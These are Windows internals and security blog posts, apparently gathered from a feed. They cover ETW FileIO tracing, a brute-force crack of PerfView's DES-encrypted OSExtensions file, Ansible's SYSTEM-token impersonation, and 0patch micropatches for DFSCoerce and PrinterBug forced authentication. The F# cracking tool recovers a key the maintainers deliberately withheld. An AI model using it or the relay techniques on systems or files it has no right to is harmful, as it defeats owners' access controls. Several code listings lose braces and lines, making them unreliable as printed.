1375,6284 (1072) FileIO/Create 'C:\Windows\win.ini' (0xFFFFFA801A43F2F0) rw-
1375,6702 (1072) FileIO/Read 'C:\Windows\win.ini' (0xFFFFFA801A43F2F0) 0x0 516b
1375,7369 (1072) FileIO/Create 'C:\Windows\SysWOW64\MAPI32.DLL' (0xFFFFFA8023E50710) rw-
1375,7585 (1072) FileIO/Close 'C:\Windows\SysWOW64\msxml6r.dll' (0xFFFFFA8023E50710)
1384,8796 (1072) FileIO/Read '' (0xFFFFFA801FDBFCD0) 0x58200 16384b

What’s causing this? Before we answer this question, let’s check how the file name resolution works internally.

File names resolution

Each ETW event emitted by the kernel is represented by the EVENT_RECORD structure. ETWTraceEventSource decodes this structure into a TraceEvent class, which is much easier to process in the managed code. As you can see in the structure definition, ETW events have some common properties, such as ProcessId, TimeStamp, or ThreadId. The data specific to a given event goes into the UserData field, which, without a proper manifest, is just a block of bytes. Thus, to process the UserData, we need a parser. The TraceEvent library already contains parsers for all the Kernel events, and it could even generate parsers dynamically. The Kernel parsers are located in a huge KernelTraceEventParser file (13K lines). By scanning through the FileIO*TraceData classes defined there, we can see that almost all of them have the FileName property. However, the way how this property is implemented differs between the parsers. For example, in FileIOCreateTraceData, we have the following code:

public string FileName { get { return state.KernelToUser(GetUnicodeStringAt(LayoutVersion <= 2 ? HostOffset(24, 3) : HostOffset(24, 2))); } }

While FileIOSimpleOpTraceData, for example, has the following implemention:

public string FileName { get { return state.FileIDToName(FileKey, FileObject, TimeStampQPC); } }

The difference is that FileIOCreateTraceData extracts the FileName from its payload (the string is in the UserData field). FileIOSimpleOpTraceData, on the other hand, queries an instance of the KernelTraceEventParserState class to find the name by either FileObject or FileKey. It keeps a private _fileIDToName dictionary for this purpose. As you may have guessed, we receive an empty path when the FileObject/FileKey is missing in this dictionary.

_fileIDToName dictionary and FileIO events

From the previous paragraph, we know that an empty path signifies that there is no record in the _fileIDToName dictionary for a given FileObject/FileKey. If we look for code that modifies this dictionary, we should quickly locate the hooks in the KernelTraceEventParser constructor:

AddCallbackForEvents(delegate (FileIONameTraceData data)
    // TODO this does now work for DCStarts.  Do DCStarts event exist?  
    var isRundown = (data.Opcode == (TraceEventOpcode)36) || (data.Opcode == (TraceEventOpcode)35);        // 36=FileIOFileRundown 35=FileIODelete
    Debug.Assert(data.FileName.Length != 0);
    state.fileIDToName.Add(data.FileKey, data.TimeStampQPC, data.FileName, isRundown);

// Because we may not have proper startup rundown, we also remember not only the FileKey but 
// also the fileObject (which is per-open file not per fileName).   
FileIOCreate += delegate (FileIOCreateTraceData data)
    state.fileIDToName.Add(data.FileObject, data.TimeStampQPC, data.FileName);

if (source.IsRealTime)
    // Keep the table under control
    Action onNameDeath = delegate (FileIONameTraceData data)
    FileIOFileDelete += onNameDeath;
    FileIOFileRundown += onNameDeath;
    FileIOCleanup += delegate (FileIOSimpleOpTraceData data)
        // Keep the table under control remove unneeded entries.  

As handlers registered here will always execute before our handlers, delete, rundown, or cleanup events won’t have the file name as it just got removed from the _fileIDToName dictionary :). A simple fix is to keep your own FileObject/FileKey/FileName map, and that’s what the current version of wtrace is doing. However, as you remember, that does not always work. After some debugging, I discovered another problem. The FileIORundown events were never emitted, so the _fileIDToName contained only FileObjects from the FileCreate events. That explains why there are almost no empty paths for processes that started while the trace session was running. After checking the documentation and some more debugging, I learned that FileIORundown events appear in the trace when you enable DiskFileIO and DiskIO keywords. And, what’s important, they are issued at the end of the trace session. Although the documentation states they contain a FileObject, it is in fact a FileKey. Fortunately, TraceEvent has the property correctly named to FileKey in the FileIONameTraceData class.

Working example

My final approach is to open a “rundown” session for two seconds, prepare my fileIDToName dictionary, and then pass it to the actual tracing session with only the FileIO events:

open System
open System.Threading
open Microsoft.Diagnostics.Tracing
open Microsoft.Diagnostics.Tracing.Parsers
open Microsoft.Diagnostics.Tracing.Session
open System.Collections.Generic
open Microsoft.Diagnostics.Tracing.Parsers.Kernel

type NtKeywords = KernelTraceEventParser.Keywords
type ClrKeywords = ClrTraceEventParser.Keywords

let rundownFileKeyMap sessionName =
    use session = new TraceEventSession(sessionName)

    let traceFlags = NtKeywords.DiskFileIO ||| NtKeywords.DiskIO
    session.EnableKernelProvider(traceFlags, NtKeywords.None) |> ignore

    let fileKeyMap = Dictionary<uint64, string>()
    session.Source.Kernel.add_FileIOFileRundown(fun ev -> fileKeyMap.[ev.FileKey] <- ev.FileName)

    use cts = new CancellationTokenSource(TimeSpan.FromSeconds(2.0))
    use _r = cts.Token.Register(fun _ -> session.Stop() |> ignore)

    session.Source.Process() |> ignore


let processEvent (fileObjectAndKeyMap : Dictionary<uint64, string>) (ev : TraceEvent) =
    let opcode = int32(ev.Opcode)

    let fileKey =
        let i = ev.PayloadIndex("FileKey")
        if i >= 0 then ev.PayloadValue(i) :?> uint64 else 0UL
    let fileObject =
        let i = ev.PayloadIndex("FileObject")
        if i >= 0 then ev.PayloadValue(i) :?> uint64 else 0UL

    let path = 
        if opcode = 64 (* create *) then
            let ev = ev :?> FileIOCreateTraceData
            let fileName = ev.FileName
            fileObjectAndKeyMap.[fileObject] <- fileName
            let chooser k =
                match fileObjectAndKeyMap.TryGetValue(k) with
                | (true, s) -> Some s
                | (false, _) -> None
            seq { fileKey; fileObject } 
            |> Seq.tryPick chooser 
            |> Option.defaultValue "n/a"

    printfn "%d %s (%d) (%s) [%d.%d] (%s) key: 0x%X object: 0x%X '%s'" 
        (uint32(ev.EventIndex)) ev.EventName opcode (ev.GetType().Name) 
        ev.ProcessID ev.ThreadID ev.ProcessName fileKey fileObject path

let main _ =
    let sessionName = sprintf "mytrace-%d" DateTime.UtcNow.Ticks

    use session = new TraceEventSession(sessionName)

    let traceFlags = NtKeywords.FileIOInit
    let stackFlags = NtKeywords.None
    session.EnableKernelProvider(traceFlags, stackFlags) |> ignore

    printf "Collecting rundown events..."
    let fileObjectAndKeyMap = rundownFileKeyMap (sprintf "%s_rundown" sessionName)
    printfn "done"
    printfn "Key map size: %d" fileObjectAndKeyMap.Count

    use _sub = session.Source.Kernel.Observe(fun s -> s.StartsWith("FileIO", StringComparison.Ordinal))
               |> Observable.subscribe (processEvent fileObjectAndKeyMap)

    Console.CancelKeyPress.Add(fun ev -> ev.Cancel <- true; session.Stop() |> ignore)

    session.Source.Process() |> ignore

    printfn "Key map size: %d" fileObjectAndKeyMap.Count

Notice, I am not removing anything from the dictionary, so you may want to add logic for that if you plan to run the trace session for a long time.

[BONUS] What are FileObject and FileKey

I’m unsure why some FileIO events have only the FileObject field, while others have both, FileKey and FileObject. To check what these fields represent, I created a simple app in LINQPad that keeps a file open while running:

    use f = new StreamWriter("D:\\temp\\test.txt")

    let rec readAndWrite () =
        let r = Console.ReadLine()
        if r  "" then
            readAndWrite ()

    readAndWrite ()

Then I started a tracing app and recorded few writes:

6243 12415615435 FileIO/Write (68) (FileIOReadWriteTraceData) [7180.1784] (LINQPad6.Query) key: 0xFFFFAE0C9B0EB7C0 object: 0xFFFF970FC37949F0 'D:\temp\test.txt'
6244 12415615551 FileIO/Write (68) (FileIOReadWriteTraceData) [7180.1784] (LINQPad6.Query) key: 0xFFFFAE0C9B0EB7C0 object: 0xFFFF970FC37949F0 'D:\temp\test.txt'
17566 12449509307 FileIO/Write (68) (FileIOReadWriteTraceData) [4.9748] (System) key: 0xFFFFAE0C9B0EB7C0 object: 0xFFFF970FC37949F0 'D:\temp\test.txt'
17567 12449509409 FileIO/SetInfo (69) (FileIOInfoTraceData) [4.9748] (System) key: 0xFFFFAE0C9B0EB7C0 object: 0xFFFF970FC37949F0 'D:\temp\test.txt'

Next, I attached WinDbg to the kernel locally and checked the FileObject address:

lkd> !fileobj 0xFFFF970FC37949F0


Device Object: 0xffff970f418ebb90   \Driver\volmgr
Vpb: 0xffff970f41ae1640
Event signalled
Access: Write SharedRead 

Flags:  0x40062
    Synchronous IO
    Sequential Only
    Cache Supported
    Handle Created

FsContext: 0xffffae0c9b0eb7c0    FsContext2: 0xffffae0c9b0eba20
Private Cache Map: 0xffff970fbccf4b18
CurrentByteOffset: e
Cache Data:
  Section Object Pointers: ffff970f4be27838
  Shared Cache Map: ffff970fbccf49a0         File Offset: e in VACB number 0
  Vacb: ffff970f3fcdfe78
  Your data is at: ffffd98630f0000e

As the !fileobj command worked, FileObject is a Kernel Object representing a file. From the WinDbg output, we can also learn that FileKey denotes the FsContext field of the FILE_OBJECT structure. As we can see in the API documentation, for the file system drivers, it must point to the FSRTL_ADVANCED_FCB_HEADER. This does not answer the initial question why some events miss this field, but at least we know its meaning.


Decrypting PerfView’s OSExtensions.cs file

25 June 2020 at 07:04

While analyzing the PerfView source code, I stumbled upon an interesting README file in the src/OSExtensions folder:

// The OSExtensions.DLL is a DLL that contains a small number of extensions
// to the operating system that allow it to do certain ETW operations.  
// However this DLL is implemented using private OS APIs, and as such should
// really be considered part of the operating system (until such time as
// the OS provide the functionality in public APIs).
// To discourage taking dependencies on these internal details we do not 
// provide the source code for this DLL in the open source repo. 
// A binary copy of this DLL is included in the TraceEvent\OSExtensions.  
// However we don't want this source code to be lost.  So we check it in
// with the rest of the code but in an encrypted form for only those few
// OS developers who may need to update this interface.   These people 
// should have access to the password needed to unencrpt the file.    
// As part of the build process for OSExtension.dll, we run the command 'syncEncrypted.exe'.
// This command keeps a encrypted and unencrypted version of a a file  in sync.
// Currently it is run on this pair
//  OSExtensions.cs   <-->  OSExtesions.cs.crypt
// Using a password file 'password.txt'  
// Thus if the password.txt exists and OSExtesions.cs.crypt exist, it will
// unencrypt it to OSExtesions.cs.   If OSExtesions.cs is newer, it will
// be reencrypted to OSExtesions.cs.crypt. 

Hmm, private OS APIs seem pretty exciting, right? A simple way to check these APIs would be to disassemble the OSExtensions.dll (for example, with dnSpy). But this method would not show us comments. And for internal APIs, they might contain valuable information. So let’s see if we can do better.

How OSExtensions.cs.crypt is encrypted

As mentioned in the README, internal PerfView developers should use the provided password.txt file and the SyncEncrypted.exe application. The SyncEncrypted.exe binaries are in the same folder as OSExtensions.cs.crypt, and they are not obfuscated. So we could see what’s the encryption method in use. The Decrypt method disassembled by dnSpy looks as follows:

// Token: 0x06000003 RID: 3 RVA: 0x000022A8 File Offset: 0x000004A8
private static void Decrypt(string inFileName, string outFileName, string password)
    Console.WriteLine("Decrypting {0} -> {1}", inFileName, outFileName);
    using (FileStream fileStream = new FileStream(inFileName, FileMode.Open, FileAccess.Read))
        using (FileStream fileStream2 = new FileStream(outFileName, FileMode.Create, FileAccess.Write))
            using (CryptoStream cryptoStream = new CryptoStream(fileStream, new DESCryptoServiceProvider
                Key = Program.GetKey(password),
                IV = Program.GetKey(password)
            }.CreateDecryptor(), CryptoStreamMode.Read))

You don’t see DES being used nowadays as its key length (56-bit) is too short for secure communication. However, 56-bit key space contains around 7,2 x 1016 keys, which may be nothing for NSA but, on my desktop, I wouldn’t finish the decryption in my lifetime. As you’re reading this post, you may assume I found another way :). The key to the shortcut is the Program.GetKey method:

// Token: 0x06000004 RID: 4 RVA: 0x0000235C File Offset: 0x0000055C
private static byte[] GetKey(string password)
    return Encoding.ASCII.GetBytes(password.GetHashCode().ToString("x").PadLeft(8, '0'));

The code above produces up to to 232 (4 294 967 296) unique keys, which is also the number of possible hash codes. And attacking such a key space is possible even on my desktop.

Preparing the decryption process

Now, it’s time to decide what we should call successful decryption. Firstly, it must not throw an exception, so the padding must be valid. As the padding is not explicitly set, DES will use PKCS7. Also, the mode for operation will be CBC:

We also know that the resulting C# file should contain mostly readable text, so it should have a high percentage of bytes in the ASCII range (assuming the data is UTF-8 encoded). Checking all these conditions would work best if we were trying to decrypt the whole file in each try. However, doing so would consume much time as the file is about 40 KB in size. An improvement would be to use the first few blocks of the encrypted file for counting the ASCII statistics, and two last blocks for the padding validation. Fortunately, we can do even better. I noticed that all the source code files in the repository are UTF-8 encoded with BOM. That means we could try decrypting only the first 64 bits of the ciphertext and check if the resulting plaintext starts with 0xEF, 0xBB, 0xBF. If it does, it may be the plaintext we are looking for. By appending the last two blocks of the ciphertext, we could also validate the padding. I haven’t done that, and I just disabled padding in DES. My decryptor code in F# (I’m still learning it) looks as follows:

open System
open System.IO
open System.Reflection
open System.Security.Cryptography
open System.Text
open System.Threading

let chars = "0123456789abcdef"B

let PassLen = 8

let homePath = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location)

let decrypt (des : DESCryptoServiceProvider) (cipher : byte array) (plain : byte array) (key : byte array) =
    use instream = new MemoryStream(cipher)
    use outstream = new MemoryStream(plain)
    use decryptor =  des.CreateDecryptor(key, key)
    use cryptostream = new CryptoStream(instream, decryptor, CryptoStreamMode.Read)

let rec gen n (s : byte array) = seq {
    for i = 0 to chars.Length - 1 do
        if n = s.Length - 1 then
            s.[n] <- chars.[i]
            yield s
            s.[n] <- chars.[i] 
            yield! gen (n + 1) s
            s.[n + 1] <- chars.[0]

let cipher = File.ReadAllBytes(Path.Combine(homePath, @"OSExtensions.cs.crypt"))

let tryDecrypt (state : byte array) =

    let checkIfValid (plain : byte array) = 
        plain.[0] = byte(0xef) && plain.[1] = byte(0xbb) && plain.[2] = byte(0xbf)

    // no padding so we won't throw unnecessary exceptions
    use des = new DESCryptoServiceProvider(Padding = PaddingMode.None)
    let plain = Array.create PassLen 0uy

    // we will generate all random strings starting from the second place in the string
    for pass in (gen 1 state) do
        decrypt des cipher plain pass
        if checkIfValid plain then
            let fileName = sprintf "pass_%d_%d.txt" Thread.CurrentThread.ManagedThreadId DateTime.UtcNow.Ticks
            File.WriteAllLines(Path.Combine(homePath, fileName), [| 
                sprintf "Found pass: %s" (Encoding.ASCII.GetString(pass));
                sprintf "Decrypted: %s" (Encoding.ASCII.GetString(plain))

let main argv =
    let zeroArray = Array.create (PassLen - 1) '0'B

    chars |> Array.map (fun ch -> async { zeroArray |> Array.append [| ch |] |> tryDecrypt }) 
          |> Async.Parallel 
          |> Async.RunSynchronously 
          |> ignore
    0 // return an integer exit code

It’s also published in my blog samples repository.

And the content of OSExtensions.cs.crypt is:

       0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
0000: 7b 37 a0 49 50 0b b2 49                          {7.IP..I

Decrypting the file

After about 40 minutes, the application generated 108 pass_ files already and one of them had the following content:

Found pass: 436886a4
Decrypted: ???using

The using statement is a very probable beginning of the C# file :). And indeed, the hash code above decrypts the whole OSExtensions.cs.crypt file. We won’t know the original PerfView password, but, as an exercise, you may try to look for strings that have the above hash code. If you find one, please leave a comment!


How Ansible impersonates users on Windows

4 May 2020 at 17:00

Recently, I hit an interesting error during a deployment orchestrated by Ansible. One of the deployment steps was to execute a custom .NET application. Unfortunately, the application was failing on each run with an ACCESS DENIED error. After collecting the stack trace, I found that the failing code was ProtectedData.Protect(messageBytes, null, DataProtectionScope.CurrentUser), so a call to the Data Protection API. To pinpoint a problem I created a simple playbook:

- hosts: all
  gather_facts: no
    ansible_user: testu
    ansible_connection: winrm
    ansible_winrm_transport: basic
    ansible_winrm_server_cert_validation: ignore
    - win_shell: |
        Add-Type -AssemblyName "System.Security"; \
            "UTF-8").GetBytes("test12345"), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
        executable: powershell
      register: output

    - debug:
        var: output

When I run it I get the following error:

fatal: []: FAILED! => {"changed": true, "cmd": "Add-Type -AssemblyName \"System.Security\"; [System.Security.Cryptography.ProtectedData]::Protect([System.Text.Encoding]::GetEncoding(\n    \"UTF-8\").GetBytes(\"test\"), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)", "delta": "0:00:00.807970", "end": "2020-05-04 11:34:29.469908", "msg": "non-zero return code", "rc": 1, "start": "2020-05-04 11:34:28.661938", "stderr": "Exception calling \"Protect\" with \"3\" argument(s): \"Access is denied.\r\n\"\r\nAt line:1 char:107\r\n+ ... .Security\"; [System.Security.Cryptography.ProtectedData]::Protect([Sy ...\r\n+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException\r\n    + FullyQualifiedErrorId : CryptographicException", "stderr_lines": ["Exception calling \"Protect\" with \"3\" argument(s): \"Access is denied.", "\"", "At line:1 char:107", "+ ... .Security\"; [System.Security.Cryptography.ProtectedData]::Protect([Sy ...", "+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", "    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException", "    + FullyQualifiedErrorId : CryptographicException"], "stdout": "", "stdout_lines": []}

The workaround to make it always work was to use the Ansible become parameters:

    - win_shell: |
        Add-Type -AssemblyName "System.Security"; \
            "UTF-8").GetBytes("test12345"), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
        executable: powershell
      become_method: runas
      become_user: testu
      become: yes
      register: output

Interestingly, the original playbook succeeds if the testu user has signed in to the remote system interactively (for example, by opening an RDP session) and encrypted something with DPAPI before running the script.

It only made me even more curious about what is happening here. I hope it made you too 🙂

What happens when you encrypt data with DPAPI

When you call CryptProtectData (or its managed wrapper ProtectedData.Protect), internally you are connecting to an RPC endpoint protected_storage exposed by the Lsass process. The procedure s_SSCryptProtectData, implemented in the dpapisrv.dll library, encrypts the data using the user’s master key. The master key is encrypted, and to decrypt it, Lsass needs a hash of the user’s password. The decryption process involves multiple steps, and if you are interested in its details, have a look at this post.

Examining the impersonation code

Before we dive into the Ansible impersonation code, I highly recommend checking the Ansible documentation on this subject as it is exceptional and covers all the authentication cases. In this post, I am describing only my case, when I am not specifying the become_user password. However, by reading the referenced code, you should have no problems in understanding other scenarios as well.

Four C# files contain the impersonation code, with the most important one being Ansible.Become.cs. Become flags define what type of access token Ansible creates for a given user session. Get-BecomeFlags contains the logic of the flags parser and handles the interaction with the C# code.

A side note: while playing with the exec wrapper, I discovered an interesting environment variable: ANSIBLE_EXEC_DEBUG. You may set its value to a path of a file where you want Ansible to write its logs. They might reveal some details on how Ansible executes your commands.

For my case, the logic of the become_wrapper could be expressed in the following PowerShell commands:

PS> Import-Module -Name $pwd\Ansible.ModuleUtils.AddType.psm1
PS> $cs = [System.IO.File]::ReadAllText("$pwd\Ansible.Become.cs"), [System.IO.File]::ReadAllText("$pwd\Ansible.Process.cs"), [System.IO.File]::ReadAllText("$pwd\Ansible.AccessToken.cs")
PS> Add-CSharpType -References $cs -IncludeDebugInfo -CompileSymbols @("TRACE")

PS> [Ansible.Become.BecomeUtil]::CreateProcessAsUser("testu", [NullString]::Value, "powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand QQBkAGQALQBU...MAZQByACkA")


The stripped base64 string is the encoded version of the commands I had in my Ansible playbook:

PS> [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("QQBkAGQALQBU...MAZQByACkA"))

Add-Type -AssemblyName "System.Security";[System.Security.Cryptography.ProtectedData]::Protect([System.Text.Encoding]::GetEncoding("UTF-16LE").GetBytes("test12345"), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)

The CreateProcessAsUser method internally calls GetUserTokens to create an elevated and a regular token (or only one if no elevation is available/required). As I do not specify a password neither a logon type, my code will eventually call GetS4UTokenForUser. S4U, or in other words, “Service for Users”, is a solution that allows services to obtain a logon for the user, but without providing the user’s credentials. To use S4U, services call the LsaLogonUser method, passing a KERB_S4U_LOGON structure as the AuthenticationInformation parameter. Of course, not all services can impersonate users. Firstly, the service must have the “Act as part of the operating system” privilege (SeTcbPrivilege). Secondly, it must register itself as a logon application (LsaRegisterLogonProcess). So how Ansible achieves that? It simply tries to “steal” (duplicate ;)) a token from one of the privileged processes by executing GetPrimaryTokenForUser(new SecurityIdentifier("S-1-5-18"), new List<string>() { "SeTcbPrivilege" }). As this method code is not very long and well documented, let me cite it here (GPL 3.0 license):

private static SafeNativeHandle GetPrimaryTokenForUser(SecurityIdentifier sid, List<string> requiredPrivileges = null)
    // According to CreateProcessWithTokenW we require a token with
    // Also add in TOKEN_IMPERSONATE so we can get an impersonated token
    TokenAccessLevels dwAccess = TokenAccessLevels.Query |
        TokenAccessLevels.Duplicate |
        TokenAccessLevels.AssignPrimary |
    foreach (SafeNativeHandle hToken in TokenUtil.EnumerateUserTokens(sid, dwAccess))
        // Filter out any Network logon tokens, using become with that is useless when S4U
        // can give us a Batch logon
        NativeHelpers.SECURITY_LOGON_TYPE tokenLogonType = GetTokenLogonType(hToken);
        if (tokenLogonType == NativeHelpers.SECURITY_LOGON_TYPE.Network)
        // Check that the required privileges are on the token
        if (requiredPrivileges != null)
            List<string> actualPrivileges = TokenUtil.GetTokenPrivileges(hToken).Select(x => x.Name).ToList();
            int missing = requiredPrivileges.Where(x => !actualPrivileges.Contains(x)).Count();
            if (missing > 0)
        // Duplicate the token to convert it to a primary token with the access level required.
            return TokenUtil.DuplicateToken(hToken, TokenAccessLevels.MaximumAllowed, SecurityImpersonationLevel.Anonymous,
        catch (Process.Win32Exception)
    return null;

public static IEnumerable<SafeNativeHandle> EnumerateUserTokens(SecurityIdentifier sid,
    TokenAccessLevels access = TokenAccessLevels.Query)
    foreach (System.Diagnostics.Process process in System.Diagnostics.Process.GetProcesses())
        // We always need the Query access level so we can query the TokenUser
        using (process)
        using (SafeNativeHandle hToken = TryOpenAccessToken(process, access | TokenAccessLevels.Query))
            if (hToken == null)
            if (!sid.Equals(GetTokenUser(hToken)))
            yield return hToken;

private static SafeNativeHandle TryOpenAccessToken(System.Diagnostics.Process process, TokenAccessLevels access)
        using (SafeNativeHandle hProcess = OpenProcess(process.Id, ProcessAccessFlags.QueryInformation, false))
            return OpenProcessToken(hProcess, access);
    catch (Win32Exception)
        return null;

Once Ansible obtains the SYSTEM token, it can register itself as a logon application and finally call LsaLogonUser to obtain the impersonation token (GetS4UTokenForUser). With the right token, it can execute CreateProcessWithTokenW and start the process in a desired user’s context.

Playing with the access tokens using TokenViewer

As we reached this point, maybe it is worth to play a bit more with Windows tokens, and try to reproduce the initial Access Denied error. For this purpose, I slightly modified the TokenViewer tool developed by James Forshaw (Google). You may find the code of my version in my blog repository.

Let’s run TokenViewer as the SYSTEM user. That should give us SeTcbPrivilege, necessary to create an impersonated tokens: psexec -s -i TokenViewer.exe. Next, let’s create an access token for the Network logon type:

Network logon session
Network logon token

On the group tab, there should be the NT AUTHORITY\NETWORK group listed. Now, let’s try to encrypt the “Hello World!” text with DPAPI on the Operations tab. We should receive an Access Denied error:

DPAPI Access Denied error

Leave the Token window open, move to the main window, and create a token for the Batch logon type. This is the token Ansible creates in the “become mode”. The groups tab should have the NT AUTHORITY\BATCH group enabled, and DPAPI encryption should work. Don’t close this window and move back to the previous token window. DPAPI will work now too.

I am not familiar enough with Lsass to explain in details what is happening here. However, I assume that the DPAPI problem is caused by the fact that Lsass does not cache user credentials when the user signs in with the logon type NETWORK (probably because of the performance reasons). Therefore, the lsasrv!LsapGetCredentials method fails when DPAPI calls it to retrieve the user password’s hash to decrypt the master key. Interestingly, if we open another session for a given user (for example, an interactive one), and call DPAPI to encrypt/decrypt some data, the user’s master key lands in the cache (lsasrv!g_MasterKeyCacheList). DPAPI searches this cache (dpapisrv!SearchMasterKeyCache) before calling LsapGetCredentials. That explains why our second call to DPAPI succeeded in the NETWORK logon session.


Micropatching the "DFSCoerce" Forced Authentication Issue (No CVE)

1 July 2022 at 09:49


by Mitja Kolsek, the 0patch Team

"DFSCoerce" is another forced authentication issue in Windows that can be used by a low-privileged domain user to take over a Windows server, potentially becoming a domain admin within minutes. The issue was discovered by security researcher Filip Dragovic, who also published a POC.

Filip's tweet indicated this issue can be used even if you have disabled or filtered services that other currently known forced authentication issues such as PrinterBug/SpoolSample, PetitPotam, ShadowCoerce and RemotePotato0 are exploiting: "Spooler service disabled, RPC filters installed to prevent PetitPotam and File Server VSS Agent Service not installed but you still want to relay DC authentication to ADCS? Don't worry MS-DFSNM have your back ;)"

A quick reminder: Microsoft does not fix forced authentication issues unless an attack can be mounted anonymously. Our customers unfortunately can't all disable relevant services or implement mitigations without breaking production, so it is on us to provide them with such patches.

The Vulnerability

The vulnerability lies in the Distributed File System (DFS) service. Any authenticated user can make a remote procedure call to this service and execute functions NetrDfsAddStdRoot or NetrDfsremoveStdRoot, providing them with host name or IP address of attacker's computer. These functions both properly perform a permissions check using a call to AccessImpersonateCheckRpcClient, which returns error code 5 ("access denied") for users who aren't allowed to do any changes to DFS. If access is denied, they block the adding or removing of a stand-alone namespace - but they both still perform a credentials-leaking request to the specified host name or IP address.

Such leaked credentials - belonging to server's computer account - can be relayed to some other service in the network such as LDAP or Certificate Service to perform privileged operations leading to further unauthorized access. Unsurprisingly, attackers and red teams like such things.

Our Micropatch

Since a proper access check was already in place, just not reacted to entirely properly, we decided to use its result and correct the logic in both vulnerable functions.

The image below shows our patch (green code blocks) injected in function NetrDfsremoveStdRoot. As you can see, a call to AccessImpersonateCheckRpcClient is made in the original code, which returns 5 ("access denied") when the caller has insufficient permissions. This information is then stored as one bit into register r8b, and copied to local variable arg_18 (sounds like an argument, but compilers use so-called "home space" for local variables when it suits them). Our patch code takes the return value of AccessImpersonateCheckRpcClient and compares it to 5; if equal, we sabotage attacker's attempts by placing a zero at the beginning of their ServerName string pointed to by rcx, effectively turning it into an empty string. This approach allows us to minimize the amount of code and complexity of the patch, which is always our goal. Function DfsDeleteStandaloneRoot, which causes the forced authentication to attacker's host, is then called from the original code (moved to a blue trampoline code block) but it gets an empty string for the host name - and returns an error. A blocked attack therefore behaves as if a request was made by an unprivileged user with an illegal ServerName. We decided not to log this as an attempted exploit to avoid possible false positives in case a regular user without malicious intent might somehow trigger this code via Windows user interface.


Source code of the micropatch shows two identical patchlets, one for function NetrDfsAddStdRoot and one for NetrDfsremoveStdRoot:

MODULE_PATH "..\Affected_Modules\dfssvc.exe_10.0.17763.2028_Srv2019_64-bit_u202206\dfssvc.exe"
VULN_ID 7442

    PATCHLET_ID 1                ; NetrDfsAddStdRoot
        neg eax                  ; get original return value from AccessImpersonateCheckRpcClient
        cmp eax, 5               ; check if access denied(5) was returned
        jne CONTINUE_1           ; return value is not 5, continue with
                                 ; normal code execution
        mov word[rcx], 0         ; else set ServerHost to NULL. Result: DFSNM
                                 ; SessionError: code: 0x57 - ERROR_INVALID_PARAMETER
                                 ; continue with original code

    PATCHLET_ID 2                ; NetrDfsremoveStdRoot
        neg eax                 
; get original return value from AccessImpersonateCheckRpcClient
        cmp eax, 5              
; check if access denied(5) was returned
        jne CONTINUE_2          
; return value is not 5, continue with
                                 ; normal code execution
        mov word[rcx], 0        
; else set ServerHost to NULL. Result: DFSNM
                                 ; SessionError: code: 0x57 -
                                 ; continue with original code


Micropatch Availability

While this vulnerability has no official patch and could be considered a "0day", Microsoft seems determined not to fix relaying issues such as this one; therefore, this micropatch is not provided in the FREE plan but requires a PRO or Enterprise license.

The micropatch was written for the following Versions of Windows with all available Windows Updates installed: 

  1. Windows Server 2008 R2
  2. Windows Server 2012
  3. Windows Server 2012 R2
  4. Windows Server 2016
  5. Windows Server 2019 
  6. Windows Server 2022 
Note that only servers are affected as the DSS Service does not exist on workstations.

This micropatch has already been distributed to, and applied on, all online 0patch Agents in PRO or Enterprise accounts (unless Enterprise group settings prevent that). 

If you're new to 0patch, create a free account in 0patch Central, then install and register 0patch Agent from 0patch.com, and email [email protected] for a trial. Everything else will happen automatically. No computer reboot will be needed.

To learn more about 0patch, please visit our Help Center

We'd like to thank  Filip Dragovic for sharing details about this vulnerability, which allowed us to create a micropatch and protect our users. We also encourage security researchers to privately share their analyses with us for micropatching.


Micropatching the "PrinterBug/SpoolSample" - Another Forced Authentication Issue in Windows

27 June 2022 at 15:11


by Mitja Kolsek, the 0patch Team

Forced authentication issues (including NTLM relaying and Kerberos relaying) are a silent elephant in the room in Windows networks, where an attacker inside the network can force a chosen computer in the same network to perform authentication over the network such that the attacker can intercept its request. In the process, the attacker obtains some user's or computer account's credentials and can then use these to perform actions with the "borrowed" identity.

In case of PetitPotam, for instance, the attacker forces a Windows server to authenticate to a computer of their choice using the computer account - which can lead to arbitrary code execution on the server. With RemotePotato0, an attacker already logged in to a Windows computer (e.g., a Terminal Server) can force the computer to reveal credentials of any other user also logged in to the same computer.

For a great primer on relaying attacks in Windows, check out the article "I’m bringing relaying back: A comprehensive guide on relaying anno 2022" by Jean-François Maes of TrustedSec. Dirk-jan Mollema of Outsider Security also wrote several excellent pieces: "The worst of both worlds: Combining NTLM Relaying and Kerberos delegation", "Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin" and "NTLM relaying to AD CS - On certificates, printers and a little hippo."

Alas, Microsoft's position seems to be not to fix forced authentication issues unless an attack can be mounted anonymously; their fix for PetitPotam confirms that - they only addressed the anonymous attack vector. In other words:

If any domain user in a typical enterprise network should decide to become domain administrator, no official patch will be made available to prevent them from doing so.

Microsoft does suggest (here, here) various countermeasures to mitigate such attacks, including disabling NTLM, enabling EPA for Certificate Authority, or requesting LDAP signing and channel binding. These mitigations, however, are often a no-go for large organizations as they would break existing processes. It therefore isn't surprising that many of our large customers ask us for micropatches to address these issues in their networks.

Consequently, at 0patch we've decided to address all  known forced authentication issues in Windows exploitable by either anonymous or low-privileged attackers.

The Vulnerability

The vulnerability we micropatched this time has two names - PrinterBug and SpoolSample - but no CVE ID as it is considered a "won't fix" by the vendor. Its first public reference is this 2018 Derbycon presentation "The Unintended Risks of Trusting Active Directory" by
Will Schroeder, Lee Christensen, and Matt Nelson of SpecterOps, where authors describe how the MS-RPRN RPC interface can be used to force a remote computer to initiate authentication to attacker's computer.

